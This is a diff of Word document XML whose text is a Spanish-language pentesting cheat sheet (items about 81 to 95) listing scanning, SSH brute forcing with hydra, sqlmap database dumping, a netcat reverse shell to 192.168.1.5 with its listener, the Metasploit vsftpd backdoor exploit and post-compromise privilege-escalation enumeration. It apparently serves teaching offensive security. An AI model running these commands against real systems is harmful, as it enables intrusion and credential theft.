@@ -2734,16 +2955,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>htop</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="78709F57">
-          <v:rect id="_x0000_i1545" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2792,7 +3011,6 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>detección intrusos</w:t>
       </w:r>
     </w:p>
@@ -2814,19 +3032,14 @@
           <w:numId w:val="3"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rootkits</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> básicos</w:t>
+      <w:r>
+        <w:t>rootkits básicos</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="139DBCB4">
-          <v:rect id="_x0000_i1546" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2847,7 +3060,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="255CEEAE">
-          <v:rect id="_x0000_i1547" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2867,51 +3080,42 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -A -T4 192.168.1.10</w:t>
+      <w:r>
+        <w:t>nmap -A -T4 192.168.1.10</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="793D3FE8">
-          <v:rect id="_x0000_i1548" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>82. Enumeración web</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nikto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -h http://192.168.1.10</w:t>
+      <w:r>
+        <w:t>nikto -h http://192.168.1.10</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="3DC9980C">
-          <v:rect id="_x0000_i1549" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2931,90 +3135,51 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hydra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -l </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -P rockyou.txt ssh://192.168.1.10</w:t>
+      <w:r>
+        <w:t>hydra -l root -P rockyou.txt ssh://192.168.1.10</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="79DAEC6E">
-          <v:rect id="_x0000_i1550" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">84. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>SQLMap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -u "http://site.com?id=1" --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>dbs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>84. SQLMap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>sqlmap -u "http://site.com?id=1" --dbs</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="5EAD43A0">
-          <v:rect id="_x0000_i1551" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -3034,306 +3199,192 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dnsenum</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> dominio.com</w:t>
+      <w:r>
+        <w:t>dnsenum dominio.com</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="38084125">
-          <v:rect id="_x0000_i1552" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">86. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> reverse shell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -e /bin/bash 192.168.1.5 4444</w:t>
+          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>86. Netcat reverse shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>nc -e /bin/bash 192.168.1.5 4444</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="2FB7F120">
-          <v:rect id="_x0000_i1553" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">87. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Listener</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lvp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 4444</w:t>
+          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>87. Listener</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nc -lvp 4444</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="3EAA1372">
-          <v:rect id="_x0000_i1554" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
+          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>88. Explotación básica</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>(Metasploit)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>msfconsole</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="1DB8C672">
+          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>89. Buscar exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>search vsftpd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="54A1C892">
+          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>90. Configurar exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>91. Enumerar usuarios en un sistema Linux comprometido</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>88. Explotación básica</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfconsole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="1DB8C672">
-          <v:rect id="_x0000_i1555" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">89. Buscar </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>search</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vsftpd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="54A1C892">
-          <v:rect id="_x0000_i1556" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">90. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Configurar</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>use exploit/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>unix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>/ftp/vsftpd_234_backdoor</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>91. Enumerar usuarios en un sistema Linux comprometido</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>Enunciado:</w:t>
       </w:r>
       <w:r>
@@ -3351,27 +3402,9 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>cat /etc/passwd</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3389,7 +3422,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="69FBBD6D">
-          <v:rect id="_x0000_i1693" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -3431,35 +3464,9 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>find</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> / -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>perm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -4000 2&gt;/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dev</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>null</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>find / -perm -4000 2&gt;/dev/null</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3471,47 +3478,30 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">Los archivos SUID se ejecutan con permisos de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> → posible vulnerabilidad.</w:t>
+        <w:t>Los archivos SUID se ejecutan con permisos de root → posible vulnerabilidad.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="799EDC08">
-          <v:rect id="_x0000_i1694" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">93. Ver procesos ejecutándose como </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <v:rect id="_x0000_i1102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>93. Ver procesos ejecutándose como root</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3523,15 +3513,7 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">Identifica procesos que se ejecutan como </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>Identifica procesos que se ejecutan como root.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3544,28 +3526,9 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>ps</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> | grep </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>ps aux | grep root</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3583,7 +3546,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="5E6C0C26">
-          <v:rect id="_x0000_i1695" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -3625,64 +3588,32 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>crontab</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -l</w:t>
+      <w:r>
+        <w:t>crontab -l</w:t>
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>crontab</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+        <w:t>cat /etc/crontab</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Explicación:</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">Scripts ejecutados por </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>root</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> pueden ser modificables → escalada.</w:t>
+        <w:t>Scripts ejecutados por root pueden ser modificables → escalada.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="721B07B6">
-          <v:rect id="_x0000_i1696" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -3724,35 +3655,9 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>find</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> / -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>writable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 2&gt;/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dev</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>null</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>find / -writable 2&gt;/dev/null</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3770,7 +3675,7 @@
     <w:p>
       <w:r>
         <w:pict w14:anchorId="1203BF44">
-          <v:rect id="_x0000_i1697" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
